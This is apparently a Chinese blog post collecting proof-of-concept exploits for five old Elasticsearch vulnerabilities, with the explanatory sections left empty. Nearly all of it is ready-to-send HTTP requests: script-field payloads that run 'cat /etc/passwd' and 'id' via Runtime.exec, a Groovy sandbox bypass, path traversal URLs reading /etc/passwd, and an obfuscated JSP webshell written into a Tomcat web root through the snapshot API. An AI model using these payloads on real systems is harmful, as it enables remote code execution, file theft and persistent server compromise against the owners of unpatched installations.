ElasticSearch漏洞合集及其POC合集

最新推荐文章于 2024-04-22 23:56:52 发布

!QK

最新推荐文章于 2024-04-22 23:56:52 发布

阅读量588

点赞数 1

文章标签： elasticsearch 大数据搜索引擎 web安全安全

本文链接：https://blog.csdn.net/weixin_46626737/article/details/132404958

版权

1.ElasticSearch 命令执行漏洞（CVE-2014-3120）
       1）漏洞原理：
       2）操作技巧：
           POST /_search?pretty HTTP/1.1
           Host: 192.168.68.129:9200
           Pragma: no-cache
           Cache-Control: no-cache
           Upgrade-Insecure-Requests: 1
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 25

           {
           "name": "phithon"
           }




           POST /_search?pretty HTTP/1.1
           Host: 192.168.68.129:9200
           Pragma: no-cache
           Cache-Control: no-cache
           Upgrade-Insecure-Requests: 1
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 369

           {
               "size": 1,
               "query": {
               "filtered": {
                   "query": {
                   "match_all": {
                   }
                   }
               }
               },
               "script_fields": {
                   "command": {
                       "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
                   }
               }
           }
       3）漏洞版本：<= v1.1.1
   2.ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427）
       1）漏洞原理：
       2）操作技巧：
           POST /website/blog/ HTTP/1.1
           Host: 192.168.68.129:9200
           Pragma: no-cache
           Cache-Control: no-cache
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
           Referer: http://192.168.68.129:9200/
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 22

           {
           "name": "test"
           }




           POST /_search?pretty HTTP/1.1
           Host: 192.168.68.129:9200
           Pragma: no-cache
           Cache-Control: no-cache
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
           Referer: http://192.168.68.129:9200/
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/text
           Content-Length: 156

           {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
       3）漏洞版本：<= v1.4.2
   3.ElasticSearch 目录穿越漏洞（CVE-2015-3337）
       1）漏洞原理：
       2）操作技巧：
           http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
       3）漏洞版本: <= v1.4.4
   4.ElasticSearch 目录穿越漏洞（CVE-2015-5531）
       1）漏洞原理：
       2）操作技巧：
           PUT /_snapshot/test HTTP/1.1
           Host: 192.168.68.129:9200
           Upgrade-Insecure-Requests: 1
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 108

           {
               "type": "fs",
               "settings": {
                   "location": "/usr/share/elasticsearch/repo/test"
               }
           }



           PUT /_snapshot/test2 HTTP/1.1
           Host: 192.168.68.129:9200
           Upgrade-Insecure-Requests: 1
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 126

           {
               "type": "fs",
               "settings": {
                   "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
               }
           }


           http://192.168.68.129:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
       3）漏洞版本：1.6.1以下
   5.Elasticsearch写入webshell漏洞（WooYun-2015-110216）
       1）漏洞原理：
       2）操作技巧：
           POST /a.jsp/a.jsp/1 HTTP/1.1
           Host: 192.168.68.129:9200
           Cache-Control: max-age=0
           Upgrade-Insecure-Requests: 1
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 228

           {"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}





           PUT /_snapshot/a.jsp HTTP/1.1
           Host: 192.168.68.129:9200
           Cache-Control: max-age=0
           Upgrade-Insecure-Requests: 1
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 107

           {
           "type": "fs",
           "settings": {
           "location": "/usr/local/tomcat/webapps/wwwroot/",
           "compress": false
           }
           }




           PUT /_snapshot/a.jsp/a.jsp HTTP/1.1
           Host: 192.168.68.129:9200
           Cache-Control: max-age=0
           Upgrade-Insecure-Requests: 1
           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
           Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
           Accept-Encoding: gzip, deflate
           Accept-Language: zh-CN,zh;q=0.9
           Cookie: wp-settings-time-1=1692082910
           Connection: close
           Content-Type: application/x-www-form-urlencoded
           Content-Length: 102

           {
               "indices": "a.jsp",
               "ignore_unavailable": "true",
               "include_global_state": false
           }


           http://192.168.68.129:8080/wwwroot/indices/a.jsp/snapshot-a.jsp?f=4444
           http://192.168.68.129:8080/wwwroot/test.jsp
       3）漏洞版本：1.5.x以前